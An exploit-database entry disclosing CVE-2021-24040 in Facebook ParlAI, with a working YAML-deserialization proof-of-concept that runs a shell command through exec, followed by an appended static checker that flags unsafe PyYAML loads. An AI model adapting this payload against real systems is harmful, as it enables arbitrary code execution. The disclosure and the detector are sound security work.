
18 changes to exploits/shellcodes

Active WebCam 11.5 - Unquoted Service Path
ECOA Building Automation System - Missing Encryption Of Sensitive Information
Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
ECOA Building Automation System - Hard-coded Credentials SSH Access
Men Salon Management System 1.0 - Multiple Vulnerabilities
ECOA Building Automation System - Weak Default Credentials
ECOA Building Automation System - Path Traversal Arbitrary File Upload
ECOA Building Automation System - Directory Traversal Content Disclosure
ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)
ECOA Building Automation System - Cookie Poisoning Authentication Bypass
ECOA Building Automation System - Configuration Download Information Disclosure
ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function
ECOA Building Automation System - Remote Privilege Escalation
ECOA Building Automation System - Local File Disclosure
ECOA Building Automation System - Arbitrary File Deletion
Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE
Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
49 lines
No EOL
1.5 KiB
Python
Executable file
# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
# Date: 2021-09-11
# Exploit Author: Abhiram V
# Vendor Homepage: https://parl.ai/
# Software Link: https://github.com/facebookresearch/ParlAI
# Version: < 1.1.0
# Tested on: Linux
# CVE: CVE-2021-24040
# References :
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
# https://anon-artist.github.io/blogs/blog3.html

############################################################################

Introduction
ParlAI (pronounced “par-lay”) is a free, open-source Python framework for
sharing, training and evaluating AI models on a variety of openly available
dialogue datasets.

############################################################################

Vulnerability details

############################################################################

Description
ParlAI was vulnerable to a YAML deserialization attack caused by unsafe
loading, which leads to arbitrary code execution.

Proof of Concept

Create the following PoC file (exploit.py)

import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config
exploit = """!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')

Execute the Python script, i.e., python3 exploit.py

Impact
Code Execution

############################################################################
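
A static check for the unsafe-loading pattern named in the Description, for auditing a code base that parses YAML configuration files. This is an added example, not code from the advisory or from ParlAI. It uses only Python's ast module; the helper names, the SAMPLE source and the assumption that PyYAML is imported under the name yaml are constructed for illustration.

```python
import ast

# Loaders restricted to plain data (str, int, list, dict, ...).
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}
# Entry points that are not limited to the safe subset; FullLoader has been
# exploitable on older PyYAML releases, UnsafeLoader is unrestricted by design.
NOT_SAFE_CALLS = {"unsafe_load", "unsafe_load_all", "full_load", "full_load_all"}


def _loader_name(call):
    """Name of the Loader given to yaml.load()/load_all(), or None if absent."""
    node = call.args[1] if len(call.args) >= 2 else None
    for kw in call.keywords:
        if kw.arg == "Loader":
            node = kw.value
    if isinstance(node, ast.Attribute):
        return node.attr
    return node.id if isinstance(node, ast.Name) else None


def find_unsafe_yaml_loads(source, yaml_aliases=("yaml",)):
    """Return (line, call, loader) tuples for risky PyYAML calls, by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        base, name = node.func.value, node.func.attr
        if not (isinstance(base, ast.Name) and base.id in yaml_aliases):
            continue
        if name in NOT_SAFE_CALLS:
            findings.append((node.lineno, name, None))
        elif name in ("load", "load_all"):
            loader = _loader_name(node)
            if loader not in SAFE_LOADERS:  # missing or non-safe Loader
                findings.append((node.lineno, name, loader))
    return sorted(findings, key=lambda f: f[0])


# Constructed sample source (not ParlAI's code): three ways to parse a config.
SAMPLE = '''import yaml
def parse_a(f):
    return yaml.load(f, Loader=yaml.FullLoader)
def parse_b(f):
    return yaml.load(f)
def parse_c(f):
    return yaml.safe_load(f)
'''

if __name__ == "__main__":
    for line, call, loader in find_unsafe_yaml_loads(SAMPLE):
        print(f"line {line}: yaml.{call}(Loader={loader})")
```

Each finding is a call site to replace with yaml.safe_load (or an explicit SafeLoader) so that tags such as !!python/object/new are rejected instead of constructed.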